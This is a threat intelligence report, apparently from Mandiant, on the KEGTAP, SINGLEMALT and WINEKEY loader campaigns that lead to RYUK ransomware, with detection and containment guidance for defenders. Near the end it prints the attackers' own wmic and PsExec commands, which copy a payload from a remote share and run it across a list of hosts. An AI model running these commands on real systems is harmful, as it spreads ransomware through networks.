Automatically investigate security alerts to reduce false positives.
Validate that security controls are working as expected.
Take decisive action with industry leading threat intelligence.
Fully map your entire environment to mitigate risks.
Defend your enterprise with managed detection and response.
Battle-test how well your security program performs.
Establish and properly orchestrate cyber defenses.
Train your security team to effectively protect your enterprise.
See case studies and customer testimonials.
Read expert perspectives and industry news.
Expand your cyber security knowledge base.
Listen to our State of the Hack, Eye on Security and Cyber Security Effectiveness podcasts.
Threat Intelligence from front line experts.
Explore the latest views on key threats, trends and predictions.
Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion.
Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within 24 hours of initial compromise.
Effective and fast detection of these campaigns is key to mitigating this threat.
The malware families enabling these attacks previously reported by Mandiant to intelligence subscribers include KEGTAP/BEERBOT, SINGLEMALT/STILLBOT and WINEKEY/CORKBOT.
While these malware families communicate with the same command and control infrastructure (C2) and are close to functional parity, there are minimal code overlaps across them.
Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9.
The operators conducting these campaigns have actively targeted hospitals, retirement communities, and medical centers, even in the midst of a global health crisis, demonstrating a clear disregard for human life.
Campaigns distributing KEGTAP, SINGLEMALT and WINEKEY have been sent to individuals at organizations across a broad range of industries and geographies using a series of shifting delivery tactics, techniques and procedures (TTPs).
Despite the frequent changes seen across these campaigns, the following has remained consistent across recent activity:
Despite this uniformity, the associated TTPs have otherwise changed regularly—both between campaigns and across multiple spam runs seen in the same day.
Notable ways that these campaigns have varied over time include:
Figure 1: Email containing internal references to target an organization’s name
Figure 2: Google Docs PDF document containing a target organization’s logo
Hiding the final payload behind multiple links is a simple yet effective way to bypass some email filtering technologies.
Various technologies have the ability to follow links in an email to try to identify malware or malicious domains; however, the number of links followed can vary.
Additionally, embedding links within a PDF document further makes automated detection and link-following difficult.
Given the possibility that accesses obtained from these campaigns may be provided to various operators to monetize, the latter-stage TTPs, including ransomware family deployed, may vary across intrusions.
A notable majority of cases where Mandiant has had visibility into these post-compromise TTPs have been attributable to UNC1878, a financially motivated actor that monetizes network access via the deployment of RYUK ransomware.
Once the loader and backdoor have been executed on the initial victim host, the actors have used this initial backdoor to download POWERTRICK and/or Cobalt Strike BEACON payloads to establish a foothold.
Notably, the respective loader and backdoor as well as POWERTRICK have typically been installed on a small number of hosts in observed incidents, suggesting these payloads may be reserved for establishing a foothold and performing initial network and host reconnaissance.
However, BEACON is frequently found on a larger number of hosts and used throughout various stages of the attack lifecycle.
Beyond the preliminary phases of each intrusion, we have seen variations in how these attackers have maintained presence after establishing an initial foothold or moving laterally within a network.
In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot.
The most commonly observed methods for escalating privileges in these incidents have involved the use of valid credentials.
The actors used a variety of techniques for accessing credentials stored in memory or on disk to access privileged accounts.
Lateral movement was most commonly accomplished using valid credentials in combination with Cobalt Strike BEACON, RDP and SMB, or using the same backdoors used to establish a foothold in victim networks.
Mandiant is directly aware of incidents involving KEGTAP that included the post-compromise deployment of RYUK ransomware.
We have also observed instances where ANCHOR infections, another backdoor associated with the same actors, preceded CONTI or MAZE deployment.
If an organization identifies a host with an active infection believed to be an instance of KEGTAP or a parallel malware family, the following containment actions are recommended.
Note that due to the velocity of this intrusion activity, these actions should be taken in parallel.
An enterprise-wide effort should be made to identify host-based artifacts related to the execution of first-stage malware and all post-intrusion activity associated with this activity.
Some baseline approaches to this have been captured as follows.
Activity associated with the KEGTAP loader can often be identified via a review of system startup folders and Userinit values under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon registry key.
Figure 3: Example LNK file associated with KEGTAP persistence within a system’s startup folders
SINGLEMALT employs BITS to maintain persistence through reboot and can often be identified via a review of anomalous BITS jobs.
SINGLEMALT uses a well-documented BITS persistence mechanism that intentionally creates a job to download a non-existent URL, which will trigger a failure event.
The job is set to retry on a regular interval, thus ensuring the malware continues to run.
To review the BITS job on a host run the command bitsadmin /list.
WINEKEY maintains persistence through reboot via the use of registry RUN keys.
Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware.
Value: Path to the backdoor
Figure 4: Example registry RUN key used by WINEKEY to maintain persistence
The ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot.
The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case.
Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\Windows\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe.
Stacking or sorting on file creation timestamps in the C:\Windows\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static.
Post-exploitation activity associated with the deployment of ransomware following these campaigns is typically conducted using the Cobalt Strike attack framework.
The BEACON payload associated with Cobalt Strike can often be identified via a review of existing registered services and service creation events (Event ID 7045), both markers of the mechanism it most commonly employs to maintain persistence.
The following are additional strategies that may aid in identifying associated activity:
The actions taken by the actors to escalate privileges and move laterally in an environment use well-documented techniques that search the network and Active Directory for common misconfigurations that expose credentials and systems for abuse.
Organizations can take steps to limit the impact and effectiveness of these techniques.
For more in-depth recommendations see our ransomware protection white paper.
For more intelligence on ransomware and other threats, please register for Mandiant Advantage Free, a no-cost version of our threat intelligence platform.
Check out this episode of State of the Hack for additional information on this threat.
Sample Email Subjects / Patterns
A significant proportion of the post-compromise activity associated with these campaigns has involved the distribution of RYUK ransomware by a threat group tracked by Mandiant as UNC1878.
As such, we are releasing indicators associated with this group.
start wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe"
start PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY "\\[REDACTED]\share$\vVv.exe" "C:\windows\temp\vVv.exe"
start PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe
FireEye detects this activity across our platforms.
The following table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.
Network Security and Email Security
